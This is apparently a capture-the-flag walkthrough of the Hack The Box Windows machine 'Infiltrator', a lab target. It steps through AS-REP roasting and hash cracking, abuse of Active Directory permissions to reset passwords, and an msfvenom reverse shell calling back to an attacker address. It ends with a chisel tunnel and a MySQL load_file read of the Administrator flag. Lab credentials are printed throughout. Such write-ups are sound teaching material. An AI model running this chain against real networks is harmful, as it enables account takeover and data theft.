Hack The Box / WINDOWS / 2026-03-27
Hack The Box - Infiltrator (Windows)
AS-REP roasting and AD ACL abuse chain to m.harris access, lateral move to Output Messenger infrastructure, and extraction of Administrator flag via internal MySQL load_file.
Target
- IP:
10.10.11.31
Recon
sudo nmap -sC -sV 10.10.11.31 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Infiltrator.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Supported Methods: OPTIONS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-04 14:49:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
|_ssl-date: 2024-09-04T14:53:10+00:00; +2s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-04T14:53:10+00:00; +3s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-04T14:53:10+00:00; +2s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-04T14:53:10+00:00; +3s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-04T14:53:10+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Issuer: commonName=dc01.infiltrator.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-30T13:20:17
| Not valid after: 2025-01-29T13:20:17
| MD5: be1d:a071:bf6d:fff0:20c0:6b23:8e7e:1763
|_SHA-1: cbda:6e22:6ccf:b5e7:534c:b9f0:d9e7:c5d8:dab9:769e
| rdp-ntlm-info:
| Target_Name: INFILTRATOR
| NetBIOS_Domain_Name: INFILTRATOR
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: infiltrator.htb
| DNS_Computer_Name: dc01.infiltrator.htb
| DNS_Tree_Name: infiltrator.htb
| Product_Version: 10.0.17763
|_ System_Time: 2024-09-04T14:52:37+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: HEAD POST OPTIONS
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
15220/tcp open unknown
15230/tcp open unknown
49667/tcp open msrpc Microsoft Windows RPC
49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49727/tcp open msrpc Microsoft Windows RPC
49752/tcp open msrpc Microsoft Windows RPC
49839/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-09-04T14:52:37
|_ start_date: N/A
Add infiltrator.htb and dc01.infiltrator.htb to /etc/hosts.
Go to http://infiltrator.htb/.
There are some users listed:
-
01 David Anderson
-
02 Olivia Martinez
-
03 Kevin Turner
-
04 Amanda Walker
-
05 Marcus Harris
-
06 Lauren Clark
-
07 Ethan Rodriguez
Create users.txt:
d.anderson
o.martinez
k.turner
a.walker
m.harris
l.clark
e.rodriguez
./kerbrute -d infiltrator.htb --dc 10.10.11.31 userenum ./users.txt
2024/09/04 17:16:33 > [+] VALID USERNAME: d.anderson@infiltrator.htb
2024/09/04 17:16:33 > [+] VALID USERNAME: o.martinez@infiltrator.htb
2024/09/04 17:16:33 > [+] VALID USERNAME: m.harris@infiltrator.htb
2024/09/04 17:16:33 > [+] VALID USERNAME: k.turner@infiltrator.htb
2024/09/04 17:16:33 > [+] VALID USERNAME: a.walker@infiltrator.htb
2024/09/04 17:16:33 > [+] VALID USERNAME: e.rodriguez@infiltrator.htb
2024/09/04 17:16:33 > [+] VALID USERNAME: l.clark@infiltrator.htb
GetNPUsers.py infiltrator.htb/ -usersfile users.txt -outputfile out -dc-ip 10.10.11.31 -no-pass
We get:
$krb5asrep$23$l.clark@INFILTRATOR.HTB:471cbb143d21515b290a0892b64206c3$7327839792f4aef13fa3c291d2e63a9b1fec6d142854c44c9481eee8639cbe9b7fb08e88da499993a37e86941391481863b495342156d1fcf188e319ce5b7a6fa222c17b1d6764ceaae1d6cc535d81e7bfec70358326cda2d11a2be6cac6cf97143bd130c46dedb0b8353f6c3011c09fbd0ec75c701fa7fe6c4bd7bd575385ccc319064d7c3699becb76c57544716d74ed467e460b43c4282058fdd7d8470ead173892cb4e9ca0d6d301a6a61aaf19a42c360c840c365b805b1bd09240bfa5ee73e3e24a3c61c7943dcc650aed9ace8c2e9c080891c7e732f00a6af2526cad4178afd47ec6687391370e664a18f1e9d79601
Put it in hash file and crack:
hashcat -a 0 ./hash ./rockyou.txt
Recovered password:
WAT?watismypass!
crackmapexec smb infiltrator.htb -u users.txt -p 'WAT?watismypass!'
SMB infiltrator.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB infiltrator.htb 445 DC01 [-] infiltrator.htb\d.anderson:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION
SMB infiltrator.htb 445 DC01 [-] infiltrator.htb\o.martinez:WAT?watismypass! STATUS_LOGON_FAILURE
SMB infiltrator.htb 445 DC01 [-] infiltrator.htb\k.turner:WAT?watismypass! STATUS_LOGON_FAILURE
SMB infiltrator.htb 445 DC01 [-] infiltrator.htb\a.walker:WAT?watismypass! STATUS_LOGON_FAILURE
SMB infiltrator.htb 445 DC01 [-] infiltrator.htb\m.harris:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION
SMB infiltrator.htb 445 DC01 [+] infiltrator.htb\l.clark:WAT?watismypass!
AD ACL Chain
bloodhound-python -u 'd.anderson' -p 'WAT?watismypass!' -ns 10.10.11.31 -d 'infiltrator.htb' -dc 'dc01.infiltrator.htb' -c All
sudo neo4j console
bloodhound --no-sandbox
Upload collected json files. Mark d.anderson as owned. Check shortest path to high value targets. See screenshot:
- attachments/s1.png
d.anderson has GenericAll over marketing digital.
getTGT.py infiltrator.htb/d.anderson:'WAT?watismypass!' -dc-ip dc01.infiltrator.htb
export KRB5CCNAME=d.anderson.ccache
wget https://raw.githubusercontent.com/fortra/impacket/master/examples/dacledit.py
Edit this line in dacledit.py:
from impacket.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
to:
from msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
Download and place this file in same folder:
- https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/helpers/msada_guids.py
python3 dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb
[*] DACL modified successfully!
Marketing Digital contains user e.rodriguez.
Download repository:
- https://github.com/CravateRouge/bloodyAD.git
python3 bloodyAD/bloodyAD.py --host 'dc01.infiltrator.htb' -d infiltrator.htb --kerberos --dc-ip 10.10.11.31 -u 'd.anderson' -p 'WAT?watismypass!' set password 'e.rodriguez' '!Kali12345678!'
[+] Password changed successfully!
crackmapexec smb infiltrator.htb -u e.rodriguez -p '!Kali12345678!'
SMB infiltrator.htb 445 DC01 [+] infiltrator.htb\e.rodriguez:!Kali12345678!
e.rodriguez has AddSelf over Chiefs Marketing.
python3 bloodyAD/bloodyAD.py --host 'dc01.infiltrator.htb' -d infiltrator.htb --dc-ip 10.10.11.31 -u 'e.rodriguez' -p '!Kali12345678!' add groupMember 'CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB' e.rodriguez
[+] e.rodriguez added to CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB
Chiefs Marketing has ForceChangePassword over m.harris.
python3 bloodyAD/bloodyAD.py --host 'dc01.infiltrator.htb' -d infiltrator.htb --dc-ip 10.10.11.31 -u 'e.rodriguez' -p '!Kali12345678!' set password m.harris '!Kali12345678!'
[+] Password changed successfully!
getTGT.py 'infiltrator.htb/m.harris:!Kali12345678!' -dc-ip dc01.infiltrator.htb
[*] Saving ticket in m.harris.ccache
export KRB5CCNAME=m.harris.ccache
Edit /etc/krb5.conf:
sudo vim /etc/krb5.conf
Add:
INFILTRATOR.HTB = {
kdc = dc01.infiltrator.htb
admin_server = infiltrator.htb
default_domain = infiltrator.htb
}
evil-winrm -i 10.10.11.31 -u m.harris -r INFILTRATOR.HTB
We get a PowerShell shell as m.harris.
Lateral Movement to Output Messenger DB
To obtain meterpreter shell:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.27 LPORT=4444 -f exe -o reverse.exe
Upload reverse.exe to target.
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run
.\reverse.exe
We get reverse meterpreter.
shell
cd \ProgramData
dir
We see Output Messenger and Output Messenger Server.
dir "Output Messenger Server\Temp"
We notice:
OutputMessengerMysql.zip
From meterpreter:
set_timeouts -x 99999999
download OutputMessengerMysql.zip
Unzip it.
cat OutputMysql.ini
[SETTINGS]
SQLPort=14406
Version=1.0.0
[DBCONFIG]
DBUsername=root
DBPassword=ibWijteig5
DBName=outputwall
cd settings
cat my.ini
We find:
password=ibWijteig5
Download chisel:
- https://github.com/jpillora/chisel
Upload chisel windows binary to target.
./chisel_linux server --port 8000 --reverse
.\chisel_windows.exe client http://10.10.16.27:8000 R:127.0.0.1:14406:127.0.0.1:14406
mysql -h 127.0.0.1 -P 14406 -u root -p
Use password:
ibWijteig5
select load_file("C:\Users\Administrator\Desktop\root.txt");